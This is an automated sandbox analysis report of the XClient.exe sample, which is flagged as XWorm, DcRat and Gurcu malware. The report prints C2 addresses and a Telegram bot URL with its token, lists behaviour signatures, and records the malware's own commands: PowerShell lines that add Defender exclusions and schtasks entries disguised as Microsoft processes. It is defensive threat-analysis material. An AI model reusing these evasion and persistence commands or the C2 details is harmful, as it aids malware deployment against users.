Overview

overview

10

Static

static

10

XClient.exe

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250207-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250207-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    10-02-2025 16:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XClient.exe

  • Size

    181KB

  • MD5

    cc753ab1d8daac56d1e705e62d632537

  • SHA1

    7950dc74519b207c3e24bbaa104df978a56872cb

  • SHA256

    1578626a3dcfb7b8f1b45b8a4ae7dddb8a185a9f8b5078bde4b094a93da14097

  • SHA512

    3dfc0e2d1ab6bf2dba387dc9fb1bb3cc1b61ff84ce0ace8569ad138121ef0a2abfdacfe4c96559b425bdda2b7c7ba7da7df0e618cc9f3a76a5ca4ca5179325f0

  • SSDEEP

    1536:LkZLPk11vanHyaRxXT2Ug+bNoZ8Avnn6emGOEPgHEJtP8TNUPhoHEq:wVf3g+bNMvnRmGOEN18TN8IEq

Score
10/10
dcratgurcuxwormadwarediscoveryexecutioninfostealerpersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

93.80.32.255:7000

Attributes
  • Install_directory

    %AppData%

  • install_file

    system132.bind.exe

  • telegram

    https://api.telegram.org/bot7603136465:AAFpLP6n-3zudeL31J79Iemu9BCZkFG8shw/sendMessage?chat_id=5177525105

Extracted

Family

xworm

Version

3.0

C2

plus-loves.gl.at.ply.gg:59327

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7603136465:AAFpLP6n-3zudeL31J79Iemu9BCZkFG8shw/sendMessage?chat_id=5177525105

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Detect Xworm Payload 4 IoCs
  • Gurcu family
    gurcu
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

    stealergurcu
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
    persistence
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 3 IoCs
  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 40 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 14 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

    stealeradware
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    defense_evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    1⤵
    • Downloads MZ/PE file
    • Checks computer location settings
    • Drops startup file
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\system132.bind.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system132.bind.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:5084
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system132.bind" /tr "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4812
    • C:\Users\Admin\AppData\Local\Temp\82VA2HM1OE19KO6.exe
      "C:\Users\Admin\AppData\Local\Temp\82VA2HM1OE19KO6.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "82VA2HM1OE19KO6" /tr "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3216
    • C:\Users\Admin\AppData\Local\Temp\QNC8731GOQHJPKH.exe
      "C:\Users\Admin\AppData\Local\Temp\QNC8731GOQHJPKH.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2468
          • C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
            "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
            5⤵
            • Modifies WinLogon for persistence
            • Checks computer location settings
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4636
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vi4fp1vm\vi4fp1vm.cmdline"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3080
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFC7.tmp" "c:\Users\Admin\AppData\Roaming\CSC34E87D7A13ED4FE182C60C089477BE9.TMP"
                7⤵
                  PID:3376
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\msd5mc2m\msd5mc2m.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1952
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35.tmp" "c:\Users\Admin\AppData\Roaming\CSC198CCA46E0934C83B8ED48F26A282482.TMP"
                  7⤵
                    PID:2644
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0pwjgpt1\0pwjgpt1.cmdline"
                  6⤵
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:3176
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2.tmp" "c:\Windows\System32\CSCC96C9C2BDE2C408AB8ABA1A788B332BD.TMP"
                    7⤵
                      PID:64
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:3808
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4552
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:2272
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4784
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:1272
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:2128
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FRCGdajqoH.bat"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1588
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      7⤵
                        PID:1920
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        7⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:1080
                      • C:\Recovery\WindowsRE\RuntimeBroker.exe
                        "C:\Recovery\WindowsRE\RuntimeBroker.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1188
          • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
            "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OTVGRDBBREYtNzBCMy00QUI1LUFBNDktMUYxN0U3M0FDQzI4fSIgdXNlcmlkPSJ7NjA0MjM0MkItN0Q2Qi00ODA5LUFEMDgtRDc4MjI2QjQxM0E5fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QkQ0RTAzQzgtNzRGNi00MTI3LUIxMTQtRDY2RkZDM0VDNEQ4fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iMTI1IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M2MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIxMjMuMC42MzEyLjEyMyIgbmV4dHZlcnNpb249IiIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMyIgaW5zdGFsbGRhdGV0aW1lPSIxNzM4OTM1NjE1IiBvb2JlX2luc3RhbGxfdGltZT0iMTMzODM0MDc5NTE4NzcwMDAwIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjE3OTg2MiIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTExNTcyNzU5OCIvPjwvYXBwPjwvcmVxdWVzdD4
            1⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:3080
          • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe
            "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
            1⤵
            • Executes dropped EXE
            PID:1080
          • C:\Users\Admin\AppData\Roaming\system132.bind.exe
            "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
            1⤵
            • Executes dropped EXE
            PID:4848
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:700
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdate" /sc ONLOGON /tr "'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2336
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Links\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1932
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4588
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3812
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3392
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:680
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4740
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3424
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:216
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdate" /sc ONLOGON /tr "'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:192
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "MicrosoftEdgeUpdateM" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\MicrosoftEdgeUpdate.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2676
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3168
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1812
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1304
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 13 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1564
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3408
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 9 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2284
          • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe
            "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3864
            • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
              "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
              2⤵
              • Executes dropped EXE
              PID:1952
            • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe
              "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe"
              2⤵
              • Executes dropped EXE
              PID:3596
          • C:\Users\Admin\AppData\Roaming\system132.bind.exe
            "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3156
            • C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe
              "C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe"
              2⤵
              • Executes dropped EXE
              PID:648
            • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
              "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
              2⤵
              • Executes dropped EXE
              PID:2856
          • C:\Windows\system32\AUDIODG.EXE
            C:\Windows\system32\AUDIODG.EXE 0x2ec 0x47c
            1⤵
              PID:4564
            • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\MicrosoftEdge_X64_132.0.2957.140.exe
              "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
              1⤵
              • Drops file in Program Files directory
              PID:3812
              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
                2⤵
                • Boot or Logon Autostart Execution: Active Setup
                • Executes dropped EXE
                • Installs/modifies Browser Helper Object
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies Internet Explorer settings
                • Modifies registry class
                • System policy modification
                PID:4808
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7593da818,0x7ff7593da824,0x7ff7593da830
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:1748
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
                  3⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  PID:3004
                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe
                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7593da818,0x7ff7593da824,0x7ff7593da830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:4032
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  PID:4068
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6ca86a818,0x7ff6ca86a824,0x7ff6ca86a830
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:472
                • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:1820
                  • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
